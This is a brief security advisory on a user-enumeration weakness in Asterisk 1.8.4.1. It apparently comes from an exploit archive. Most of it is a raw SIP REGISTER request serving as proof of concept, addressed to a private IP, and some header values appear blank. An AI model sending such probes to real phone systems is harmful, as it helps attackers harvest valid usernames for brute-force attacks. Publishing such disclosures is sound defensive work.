source: https://www.securityfocus.com/bid/48008/info Asterisk is prone to a user-enumeration weakness. An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks. This issue affects Asterisk 1.8.4.1; other versions may also be affected. REGISTER sip:192.168.2.1 SIP/2.0 CSeq: 123 REGISTER Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport User-Agent: TT From: ;tag=642d29cd-0671-e011-81a1-a1816009ca7a Call-ID: 2e2f07e0499cec3abf7045ef3610f0f2 To: Refer-To: sip:500@192.168.2.1 Contact: ;q=1 Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING Expires: 3600 Content-Length: 28000 Max-Forwards: 70